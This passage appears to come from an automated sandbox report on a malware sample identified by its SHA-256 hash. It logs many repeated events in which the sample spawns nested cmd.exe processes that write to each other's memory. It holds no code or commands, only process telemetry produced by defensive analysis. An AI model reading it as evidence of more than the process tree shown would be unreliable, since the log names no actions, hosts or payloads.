405 PID 1412 wrote to memory of 484 1412 cmd.exe 405 PID 1412 wrote to memory of 1788 1412 cmd.exe 406 PID 1412 wrote to memory of 1788 1412 cmd.exe 406 PID 1412 wrote to memory of 1788 1412 cmd.exe 406 PID 1412 wrote to memory of 1788 1412 cmd.exe 406 PID 1788 wrote to memory of 1960 1788 cmd.exe 407 PID 1788 wrote to memory of 1960 1788 cmd.exe 407 PID 1788 wrote to memory of 1960 1788 cmd.exe 407 PID 1788 wrote to memory of 1960 1788 cmd.exe 407 PID 1412 wrote to memory of 1080 1412 cmd.exe 408 PID 1412 wrote to memory of 1080 1412 cmd.exe 408 PID 1412 wrote to memory of 1080 1412 cmd.exe 408 PID 1412 wrote to memory of 1080 1412 cmd.exe 408 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 409 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 409 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 409 PID 1116 wrote to memory of 1936 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 409 PID 1936 wrote to memory of 1952 1936 cmd.exe 411 PID 1936 wrote to memory of 1952 1936 cmd.exe 411 PID 1936 wrote to memory of 1952 1936 cmd.exe 411 PID 1936 wrote to memory of 1952 1936 cmd.exe 411 PID 1936 wrote to memory of 928 1936 cmd.exe 412 PID 1936 wrote to memory of 928 1936 cmd.exe 412 PID 1936 wrote to memory of 928 1936 cmd.exe 412 PID 1936 wrote to memory of 928 1936 cmd.exe 412 PID 1936 wrote to memory of 216 1936 cmd.exe 413 PID 1936 wrote to memory of 216 1936 cmd.exe 413 PID 1936 wrote to memory of 216 1936 cmd.exe 413 PID 1936 wrote to memory of 216 1936 cmd.exe 413 PID 216 wrote to memory of 1984 216 cmd.exe 414 PID 216 wrote to memory of 1984 216 cmd.exe 414 PID 216 wrote to memory of 1984 216 cmd.exe 414 PID 216 wrote to memory of 1984 216 cmd.exe 414 PID 1936 wrote to memory of 1888 1936 cmd.exe 415 PID 1936 wrote to memory of 1888 1936 cmd.exe 415 PID 1936 wrote to memory of 1888 1936 cmd.exe 415 PID 1936 wrote to memory of 1888 1936 cmd.exe 415 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 416 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 416 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 416 PID 1116 wrote to memory of 232 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 416 PID 232 wrote to memory of 524 232 cmd.exe 418 PID 232 wrote to memory of 524 232 cmd.exe 418 PID 232 wrote to memory of 524 232 cmd.exe 418 PID 232 wrote to memory of 524 232 cmd.exe 418 PID 232 wrote to memory of 916 232 cmd.exe 419 PID 232 wrote to memory of 916 232 cmd.exe 419 PID 232 wrote to memory of 916 232 cmd.exe 419 PID 232 wrote to memory of 916 232 cmd.exe 419 PID 232 wrote to memory of 204 232 cmd.exe 420 PID 232 wrote to memory of 204 232 cmd.exe 420 PID 232 wrote to memory of 204 232 cmd.exe 420 PID 232 wrote to memory of 204 232 cmd.exe 420 PID 204 wrote to memory of 228 204 cmd.exe 421 PID 204 wrote to memory of 228 204 cmd.exe 421 PID 204 wrote to memory of 228 204 cmd.exe 421 PID 204 wrote to memory of 228 204 cmd.exe 421 PID 232 wrote to memory of 300 232 cmd.exe 422 PID 232 wrote to memory of 300 232 cmd.exe 422 PID 232 wrote to memory of 300 232 cmd.exe 422 PID 232 wrote to memory of 300 232 cmd.exe 422 PID 1116 wrote to memory of 220 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 423 PID 1116 wrote to memory of 220 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 423 PID 1116 wrote to memory of 220 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 423 PID 1116 wrote to memory of 220 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 423 PID 220 wrote to memory of 1892 220 cmd.exe 425 PID 220 wrote to memory of 1892 220 cmd.exe 425 PID 220 wrote to memory of 1892 220 cmd.exe 425 PID 220 wrote to memory of 1892 220 cmd.exe 425 PID 220 wrote to memory of 1512 220 cmd.exe 426 PID 220 wrote to memory of 1512 220 cmd.exe 426 PID 220 wrote to memory of 1512 220 cmd.exe 426 PID 220 wrote to memory of 1512 220 cmd.exe 426 PID 220 wrote to memory of 1420 220 cmd.exe 427 PID 220 wrote to memory of 1420 220 cmd.exe 427 PID 220 wrote to memory of 1420 220 cmd.exe 427 PID 220 wrote to memory of 1420 220 cmd.exe 427 PID 1420 wrote to memory of 1404 1420 cmd.exe 428 PID 1420 wrote to memory of 1404 1420 cmd.exe 428 PID 1420 wrote to memory of 1404 1420 cmd.exe 428 PID 1420 wrote to memory of 1404 1420 cmd.exe 428 PID 220 wrote to memory of 1948 220 cmd.exe 429 PID 220 wrote to memory of 1948 220 cmd.exe 429 PID 220 wrote to memory of 1948 220 cmd.exe 429 PID 220 wrote to memory of 1948 220 cmd.exe 429 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 430 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 430 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 430 PID 1116 wrote to memory of 1952 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 430 PID 1952 wrote to memory of 968 1952 cmd.exe 432 PID 1952 wrote to memory of 968 1952 cmd.exe 432 PID 1952 wrote to memory of 968 1952 cmd.exe 432 PID 1952 wrote to memory of 968 1952 cmd.exe 432 PID 1952 wrote to memory of 208 1952 cmd.exe 433 PID 1952 wrote to memory of 208 1952 cmd.exe 433 PID 1952 wrote to memory of 208 1952 cmd.exe 433 PID 1952 wrote to memory of 208 1952 cmd.exe 433 PID 1952 wrote to memory of 1372 1952 cmd.exe 434 PID 1952 wrote to memory of 1372 1952 cmd.exe 434 PID 1952 wrote to memory of 1372 1952 cmd.exe 434 PID 1952 wrote to memory of 1372 1952 cmd.exe 434 PID 1372 wrote to memory of 1888 1372 cmd.exe 435 PID 1372 wrote to memory of 1888 1372 cmd.exe 435 PID 1372 wrote to memory of 1888 1372 cmd.exe 435 PID 1372 wrote to memory of 1888 1372 cmd.exe 435 PID 1952 wrote to memory of 280 1952 cmd.exe 436 PID 1952 wrote to memory of 280 1952 cmd.exe 436 PID 1952 wrote to memory of 280 1952 cmd.exe 436 PID 1952 wrote to memory of 280 1952 cmd.exe 436 PID 1116 wrote to memory of 1260 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 437 PID 1116 wrote to memory of 1260 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 437 PID 1116 wrote to memory of 1260 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 437 PID 1116 wrote to memory of 1260 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 437 PID 1260 wrote to memory of 972 1260 cmd.exe 439 PID 1260 wrote to memory of 972 1260 cmd.exe 439 PID 1260 wrote to memory of 972 1260 cmd.exe 439 PID 1260 wrote to memory of 972 1260 cmd.exe 439 PID 1260 wrote to memory of 1468 1260 cmd.exe 440 PID 1260 wrote to memory of 1468 1260 cmd.exe 440 PID 1260 wrote to memory of 1468 1260 cmd.exe 440 PID 1260 wrote to memory of 1468 1260 cmd.exe 440 PID 1260 wrote to memory of 1860 1260 cmd.exe 441 PID 1260 wrote to memory of 1860 1260 cmd.exe 441 PID 1260 wrote to memory of 1860 1260 cmd.exe 441 PID 1260 wrote to memory of 1860 1260 cmd.exe 441 PID 1860 wrote to memory of 300 1860 cmd.exe 442 PID 1860 wrote to memory of 300 1860 cmd.exe 442 PID 1860 wrote to memory of 300 1860 cmd.exe 442 PID 1860 wrote to memory of 300 1860 cmd.exe 442 PID 1260 wrote to memory of 940 1260 cmd.exe 443 PID 1260 wrote to memory of 940 1260 cmd.exe 443 PID 1260 wrote to memory of 940 1260 cmd.exe 443 PID 1260 wrote to memory of 940 1260 cmd.exe 443 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 444 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 444 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 444 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 444 PID 1960 wrote to memory of 1564 1960 cmd.exe 446 PID 1960 wrote to memory of 1564 1960 cmd.exe 446 PID 1960 wrote to memory of 1564 1960 cmd.exe 446 PID 1960 wrote to memory of 1564 1960 cmd.exe 446 PID 1960 wrote to memory of 1404 1960 cmd.exe 447 PID 1960 wrote to memory of 1404 1960 cmd.exe 447 PID 1960 wrote to memory of 1404 1960 cmd.exe 447 PID 1960 wrote to memory of 1404 1960 cmd.exe 447 PID 1960 wrote to memory of 1816 1960 cmd.exe 448 PID 1960 wrote to memory of 1816 1960 cmd.exe 448 PID 1960 wrote to memory of 1816 1960 cmd.exe 448 PID 1960 wrote to memory of 1816 1960 cmd.exe 448 PID 1816 wrote to memory of 236 1816 cmd.exe 449 PID 1816 wrote to memory of 236 1816 cmd.exe 449 PID 1816 wrote to memory of 236 1816 cmd.exe 449 PID 1816 wrote to memory of 236 1816 cmd.exe 449 PID 1960 wrote to memory of 864 1960 cmd.exe 450 PID 1960 wrote to memory of 864 1960 cmd.exe 450 PID 1960 wrote to memory of 864 1960 cmd.exe 450 PID 1960 wrote to memory of 864 1960 cmd.exe 450 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 451 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 451 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 451 PID 1116 wrote to memory of 1984 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 451 PID 1984 wrote to memory of 944 1984 cmd.exe 453 PID 1984 wrote to memory of 944 1984 cmd.exe 453 PID 1984 wrote to memory of 944 1984 cmd.exe 453 PID 1984 wrote to memory of 944 1984 cmd.exe 453 PID 1984 wrote to memory of 1888 1984 cmd.exe 454 PID 1984 wrote to memory of 1888 1984 cmd.exe 454 PID 1984 wrote to memory of 1888 1984 cmd.exe 454 PID 1984 wrote to memory of 1888 1984 cmd.exe 454 PID 1984 wrote to memory of 1876 1984 cmd.exe 455 PID 1984 wrote to memory of 1876 1984 cmd.exe 455 PID 1984 wrote to memory of 1876 1984 cmd.exe 455 PID 1984 wrote to memory of 1876 1984 cmd.exe 455 PID 1876 wrote to memory of 1028 1876 cmd.exe 456 PID 1876 wrote to memory of 1028 1876 cmd.exe 456 PID 1876 wrote to memory of 1028 1876 cmd.exe 456 PID 1876 wrote to memory of 1028 1876 cmd.exe 456 PID 1984 wrote to memory of 1752 1984 cmd.exe 457 PID 1984 wrote to memory of 1752 1984 cmd.exe 457 PID 1984 wrote to memory of 1752 1984 cmd.exe 457 PID 1984 wrote to memory of 1752 1984 cmd.exe 457 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 458 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 458 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 458 PID 1116 wrote to memory of 1096 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 458 PID 1096 wrote to memory of 1324 1096 cmd.exe 460 PID 1096 wrote to memory of 1324 1096 cmd.exe 460 PID 1096 wrote to memory of 1324 1096 cmd.exe 460 PID 1096 wrote to memory of 1324 1096 cmd.exe 460 PID 1096 wrote to memory of 300 1096 cmd.exe 461 PID 1096 wrote to memory of 300 1096 cmd.exe 461 PID 1096 wrote to memory of 300 1096 cmd.exe 461 PID 1096 wrote to memory of 300 1096 cmd.exe 461 PID 1096 wrote to memory of 212 1096 cmd.exe 462 PID 1096 wrote to memory of 212 1096 cmd.exe 462 PID 1096 wrote to memory of 212 1096 cmd.exe 462 PID 1096 wrote to memory of 212 1096 cmd.exe 462 PID 212 wrote to memory of 680 212 cmd.exe 463 PID 212 wrote to memory of 680 212 cmd.exe 463 PID 212 wrote to memory of 680 212 cmd.exe 463 PID 212 wrote to memory of 680 212 cmd.exe 463 PID 1096 wrote to memory of 1376 1096 cmd.exe 464 PID 1096 wrote to memory of 1376 1096 cmd.exe 464 PID 1096 wrote to memory of 1376 1096 cmd.exe 464 PID 1096 wrote to memory of 1376 1096 cmd.exe 464 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 465 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 465 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 465 PID 1116 wrote to memory of 296 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 465 PID 296 wrote to memory of 1840 296 cmd.exe 467 PID 296 wrote to memory of 1840 296 cmd.exe 467 PID 296 wrote to memory of 1840 296 cmd.exe 467 PID 296 wrote to memory of 1840 296 cmd.exe 467 PID 296 wrote to memory of 236 296 cmd.exe 468 PID 296 wrote to memory of 236 296 cmd.exe 468 PID 296 wrote to memory of 236 296 cmd.exe 468 PID 296 wrote to memory of 236 296 cmd.exe 468 PID 296 wrote to memory of 928 296 cmd.exe 469 PID 296 wrote to memory of 928 296 cmd.exe 469 PID 296 wrote to memory of 928 296 cmd.exe 469 PID 296 wrote to memory of 928 296 cmd.exe 469 PID 928 wrote to memory of 1808 928 cmd.exe 470 PID 928 wrote to memory of 1808 928 cmd.exe 470 PID 928 wrote to memory of 1808 928 cmd.exe 470 PID 928 wrote to memory of 1808 928 cmd.exe 470 PID 296 wrote to memory of 1512 296 cmd.exe 471 PID 296 wrote to memory of 1512 296 cmd.exe 471 PID 296 wrote to memory of 1512 296 cmd.exe 471 PID 296 wrote to memory of 1512 296 cmd.exe 471 PID 1116 wrote to memory of 380 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 472 PID 1116 wrote to memory of 380 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 472 PID 1116 wrote to memory of 380 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 472 PID 1116 wrote to memory of 380 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 472 PID 380 wrote to memory of 1912 380 cmd.exe 474 PID 380 wrote to memory of 1912 380 cmd.exe 474 PID 380 wrote to memory of 1912 380 cmd.exe 474 PID 380 wrote to memory of 1912 380 cmd.exe 474 PID 380 wrote to memory of 280 380 cmd.exe 475 PID 380 wrote to memory of 280 380 cmd.exe 475 PID 380 wrote to memory of 280 380 cmd.exe 475 PID 380 wrote to memory of 280 380 cmd.exe 475 PID 380 wrote to memory of 1876 380 cmd.exe 476 PID 380 wrote to memory of 1876 380 cmd.exe 476 PID 380 wrote to memory of 1876 380 cmd.exe 476 PID 380 wrote to memory of 1876 380 cmd.exe 476 PID 1876 wrote to memory of 1204 1876 cmd.exe 477 PID 1876 wrote to memory of 1204 1876 cmd.exe 477 PID 1876 wrote to memory of 1204 1876 cmd.exe 477 PID 1876 wrote to memory of 1204 1876 cmd.exe 477 PID 380 wrote to memory of 1984 380 cmd.exe 478 PID 380 wrote to memory of 1984 380 cmd.exe 478 PID 380 wrote to memory of 1984 380 cmd.exe 478 PID 380 wrote to memory of 1984 380 cmd.exe 478 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 479 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 479 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 479 PID 1116 wrote to memory of 1580 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 479 PID 1580 wrote to memory of 848 1580 cmd.exe 481 PID 1580 wrote to memory of 848 1580 cmd.exe 481 PID 1580 wrote to memory of 848 1580 cmd.exe 481 PID 1580 wrote to memory of 848 1580 cmd.exe 481 PID 1580 wrote to memory of 940 1580 cmd.exe 482 PID 1580 wrote to memory of 940 1580 cmd.exe 482 PID 1580 wrote to memory of 940 1580 cmd.exe 482 PID 1580 wrote to memory of 940 1580 cmd.exe 482 PID 1580 wrote to memory of 1168 1580 cmd.exe 483 PID 1580 wrote to memory of 1168 1580 cmd.exe 483 PID 1580 wrote to memory of 1168 1580 cmd.exe 483 PID 1580 wrote to memory of 1168 1580 cmd.exe 483 PID 1168 wrote to memory of 916 1168 cmd.exe 484 PID 1168 wrote to memory of 916 1168 cmd.exe 484 PID 1168 wrote to memory of 916 1168 cmd.exe 484 PID 1168 wrote to memory of 916 1168 cmd.exe 484 PID 1580 wrote to memory of 1468 1580 cmd.exe 485 PID 1580 wrote to memory of 1468 1580 cmd.exe 485 PID 1580 wrote to memory of 1468 1580 cmd.exe 485 PID 1580 wrote to memory of 1468 1580 cmd.exe 485 PID 1116 wrote to memory of 2016 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 486 PID 1116 wrote to memory of 2016 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 486 PID 1116 wrote to memory of 2016 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 486 PID 1116 wrote to memory of 2016 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 486 PID 2016 wrote to memory of 1892 2016 cmd.exe 488 PID 2016 wrote to memory of 1892 2016 cmd.exe 488 PID 2016 wrote to memory of 1892 2016 cmd.exe 488 PID 2016 wrote to memory of 1892 2016 cmd.exe 488 PID 2016 wrote to memory of 1808 2016 cmd.exe 489 PID 2016 wrote to memory of 1808 2016 cmd.exe 489 PID 2016 wrote to memory of 1808 2016 cmd.exe 489 PID 2016 wrote to memory of 1808 2016 cmd.exe 489 PID 2016 wrote to memory of 968 2016 cmd.exe 490 PID 2016 wrote to memory of 968 2016 cmd.exe 490 PID 2016 wrote to memory of 968 2016 cmd.exe 490 PID 2016 wrote to memory of 968 2016 cmd.exe 490 PID 968 wrote to memory of 1128 968 cmd.exe 491 PID 968 wrote to memory of 1128 968 cmd.exe 491 PID 968 wrote to memory of 1128 968 cmd.exe 491 PID 968 wrote to memory of 1128 968 cmd.exe 491 PID 2016 wrote to memory of 296 2016 cmd.exe 492 PID 2016 wrote to memory of 296 2016 cmd.exe 492 PID 2016 wrote to memory of 296 2016 cmd.exe 492 PID 2016 wrote to memory of 296 2016 cmd.exe 492 PID 1116 wrote to memory of 548 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 493 PID 1116 wrote to memory of 548 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 493 PID 1116 wrote to memory of 548 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 493 PID 1116 wrote to memory of 548 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 493 PID 548 wrote to memory of 280 548 cmd.exe 495 PID 548 wrote to memory of 280 548 cmd.exe 495 PID 548 wrote to memory of 280 548 cmd.exe 495 PID 548 wrote to memory of 280 548 cmd.exe 495 PID 548 wrote to memory of 896 548 cmd.exe 496 PID 548 wrote to memory of 896 548 cmd.exe 496 PID 548 wrote to memory of 896 548 cmd.exe 496 PID 548 wrote to memory of 896 548 cmd.exe 496 PID 548 wrote to memory of 1236 548 cmd.exe 497 PID 548 wrote to memory of 1236 548 cmd.exe 497 PID 548 wrote to memory of 1236 548 cmd.exe 497 PID 548 wrote to memory of 1236 548 cmd.exe 497 PID 1236 wrote to memory of 972 1236 cmd.exe 498 PID 1236 wrote to memory of 972 1236 cmd.exe 498 PID 1236 wrote to memory of 972 1236 cmd.exe 498 PID 1236 wrote to memory of 972 1236 cmd.exe 498 PID 548 wrote to memory of 1888 548 cmd.exe 499 PID 548 wrote to memory of 1888 548 cmd.exe 499 PID 548 wrote to memory of 1888 548 cmd.exe 499 PID 548 wrote to memory of 1888 548 cmd.exe 499 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 500 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 500 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 500 PID 1116 wrote to memory of 1860 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 500 PID 1860 wrote to memory of 680 1860 cmd.exe 502 PID 1860 wrote to memory of 680 1860 cmd.exe 502 PID 1860 wrote to memory of 680 1860 cmd.exe 502 PID 1860 wrote to memory of 680 1860 cmd.exe 502 PID 1860 wrote to memory of 1344 1860 cmd.exe 503 PID 1860 wrote to memory of 1344 1860 cmd.exe 503 PID 1860 wrote to memory of 1344 1860 cmd.exe 503 PID 1860 wrote to memory of 1344 1860 cmd.exe 503 PID 1860 wrote to memory of 916 1860 cmd.exe 504 PID 1860 wrote to memory of 916 1860 cmd.exe 504 PID 1860 wrote to memory of 916 1860 cmd.exe 504 PID 1860 wrote to memory of 916 1860 cmd.exe 504 PID 916 wrote to memory of 1564 916 cmd.exe 505 PID 916 wrote to memory of 1564 916 cmd.exe 505 PID 916 wrote to memory of 1564 916 cmd.exe 505 PID 916 wrote to memory of 1564 916 cmd.exe 505 PID 1860 wrote to memory of 1416 1860 cmd.exe 506 PID 1860 wrote to memory of 1416 1860 cmd.exe 506 PID 1860 wrote to memory of 1416 1860 cmd.exe 506 PID 1860 wrote to memory of 1416 1860 cmd.exe 506 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 507 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 507 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 507 PID 1116 wrote to memory of 1840 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 507 PID 1840 wrote to memory of 1528 1840 cmd.exe 509 PID 1840 wrote to memory of 1528 1840 cmd.exe 509 PID 1840 wrote to memory of 1528 1840 cmd.exe 509 PID 1840 wrote to memory of 1528 1840 cmd.exe 509 PID 1840 wrote to memory of 900 1840 cmd.exe 510 PID 1840 wrote to memory of 900 1840 cmd.exe 510 PID 1840 wrote to memory of 900 1840 cmd.exe 510 PID 1840 wrote to memory of 900 1840 cmd.exe 510 PID 1840 wrote to memory of 1128 1840 cmd.exe 511 PID 1840 wrote to memory of 1128 1840 cmd.exe 511 PID 1840 wrote to memory of 1128 1840 cmd.exe 511 PID 1840 wrote to memory of 1128 1840 cmd.exe 511 PID 1128 wrote to memory of 1420 1128 cmd.exe 512 PID 1128 wrote to memory of 1420 1128 cmd.exe 512 PID 1128 wrote to memory of 1420 1128 cmd.exe 512 PID 1128 wrote to memory of 1420 1128 cmd.exe 512 PID 1840 wrote to memory of 1948 1840 cmd.exe 513 PID 1840 wrote to memory of 1948 1840 cmd.exe 513 PID 1840 wrote to memory of 1948 1840 cmd.exe 513 PID 1840 wrote to memory of 1948 1840 cmd.exe 513 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 514 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 514 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 514 PID 1116 wrote to memory of 1108 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 514 PID 1108 wrote to memory of 1772 1108 cmd.exe 516 PID 1108 wrote to memory of 1772 1108 cmd.exe 516 PID 1108 wrote to memory of 1772 1108 cmd.exe 516 PID 1108 wrote to memory of 1772 1108 cmd.exe 516 PID 1108 wrote to memory of 208 1108 cmd.exe 517 PID 1108 wrote to memory of 208 1108 cmd.exe 517 PID 1108 wrote to memory of 208 1108 cmd.exe 517 PID 1108 wrote to memory of 208 1108 cmd.exe 517 PID 1108 wrote to memory of 972 1108 cmd.exe 518 PID 1108 wrote to memory of 972 1108 cmd.exe 518 PID 1108 wrote to memory of 972 1108 cmd.exe 518 PID 1108 wrote to memory of 972 1108 cmd.exe 518 PID 972 wrote to memory of 1936 972 cmd.exe 519 PID 972 wrote to memory of 1936 972 cmd.exe 519 PID 972 wrote to memory of 1936 972 cmd.exe 519 PID 972 wrote to memory of 1936 972 cmd.exe 519 PID 1108 wrote to memory of 1028 1108 cmd.exe 520 PID 1108 wrote to memory of 1028 1108 cmd.exe 520 PID 1108 wrote to memory of 1028 1108 cmd.exe 520 PID 1108 wrote to memory of 1028 1108 cmd.exe 520 PID 1116 wrote to memory of 756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 521 PID 1116 wrote to memory of 756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 521 PID 1116 wrote to memory of 756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 521 PID 1116 wrote to memory of 756 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 521 PID 756 wrote to memory of 1096 756 cmd.exe 523 PID 756 wrote to memory of 1096 756 cmd.exe 523 PID 756 wrote to memory of 1096 756 cmd.exe 523 PID 756 wrote to memory of 1096 756 cmd.exe 523 PID 756 wrote to memory of 1896 756 cmd.exe 524 PID 756 wrote to memory of 1896 756 cmd.exe 524 PID 756 wrote to memory of 1896 756 cmd.exe 524 PID 756 wrote to memory of 1896 756 cmd.exe 524 PID 756 wrote to memory of 1564 756 cmd.exe 525 PID 756 wrote to memory of 1564 756 cmd.exe 525 PID 756 wrote to memory of 1564 756 cmd.exe 525 PID 756 wrote to memory of 1564 756 cmd.exe 525 PID 1564 wrote to memory of 1580 1564 cmd.exe 526 PID 1564 wrote to memory of 1580 1564 cmd.exe 526 PID 1564 wrote to memory of 1580 1564 cmd.exe 526 PID 1564 wrote to memory of 1580 1564 cmd.exe 526 PID 756 wrote to memory of 484 756 cmd.exe 527 PID 756 wrote to memory of 484 756 cmd.exe 527 PID 756 wrote to memory of 484 756 cmd.exe 527 PID 756 wrote to memory of 484 756 cmd.exe 527 PID 1116 wrote to memory of 1960 1116 d87d1fbeffe5b18e22f288780bf50b1e7d5af9bbe2480c80ea2a7497a3d52829.bin.exe 528 PID 